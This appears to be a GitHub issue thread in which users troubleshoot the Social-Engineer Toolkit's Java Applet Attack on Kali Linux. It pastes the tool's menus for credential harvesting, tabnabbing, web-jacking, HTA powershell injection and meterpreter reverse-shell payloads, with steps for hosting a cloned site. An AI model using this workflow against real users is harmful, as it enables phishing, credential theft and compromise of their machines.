leopold2607
commented
6 years ago Same problems here ! I try default options on LAN as described by Johnzam. When I had to configure payload something went wrong, and it lead me to the menu of SET I had this : Set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1 [] Prepping pyInjector for delivery.. [] Prepping website for pyInjector shellcode injection.. [] Base64 encoding shellcode and prepping for delivery.. [] Multi/Pyinjection was specified. Overriding config options. [] Generating x86-based powershell injection code... [] Finished generating powershell injection bypass. [*] Encoded to bypass execution restriction policy...
Web Server Launched. Welcome to the SET Web Attack.
[--] Tested on Windows, Linux, and OSX [--] [] Moving payload into cloned website. [] The site has been moved. SET Web Server is now listening..
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method
99) Return to Main Menu
set:webattack>
So when I had this I moved files which was into .set/web_clone/ to /var/www/html/ Then I started apache 2 service manually (service apache2 stop then restart then status) Then I tried to reach the site on LAN, it worked but the java applet didn't appear. I checked if in firefox or IE options to run java applet was enabled and it was. So i don't understand why it's not working
Can you help me to find out what's wrong ? maybe i miss something ^^
trustedsec
henrymendonca
ehacking-k2
yanerkouxin
Expected Behaviour
I am currently using SET version 7.7.9 on a Kali Rolling distro and wanted to give the Java Applet Attack Method a try. When selecting "Web Templates", I then select "no" to NAT, followed by inputting my local IP, I then choose the "Use the applet built into SET" option. The "Okay! Using the one built into SET..." message appears. What should appear next is the "select a template" list which shows:
Actual Behaviour Instead of the five option menu above for the select template, I get the following after choosing, "Use the applet built into SET":
**For templates, when a POST is initiated to harvest credentials, you will need a site for it to redirect.
You can configure this option under:
Edit this file, and change HARVESTER_REDIRECT and HARVESTER_URL to the sites you want to redirect to after it is posted. If you do not set these, then it will not redirect properly. This only goes for templates.
If I choose option 1, I get:
**Name: Description:
1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection 2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection 3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET 4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support 5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP 6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec 7) Import your own executable Specify a path for your own executable 8) Import your own commands.txt Specify payloads to be sent via command line**
I'll arbitrarily choose option 1, then enter 443 for the port listener and get the following options:
**Select the payload you want to deliver via shellcode injection
1) Windows Meterpreter Reverse TCP 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager 4) Windows Meterpreter (ALL PORTS) Reverse TCP**
I'll choose option 1, and the process will hang at:
Web Server Launched. Welcome to the SET Web Attack.
[--] Tested on Windows, Linux, and OSX [--] [] Moving payload into cloned website. [] The site has been moved. SET Web Server is now listening..**
I'm not sure why it's mentioning "cloned website" when I chose the Web templates option to push the Java update .exe.
Please let me know what I'm missing and / or if you need additional information.
P.S. I did try the password harvester a couple of weeks ago and that worked fine.
SET version is 7.7.9
Kali version: Description: Kali GNU/Linux Rolling Release: kali-rolling Codename: kali-rolling
Running on VMWare workstation 12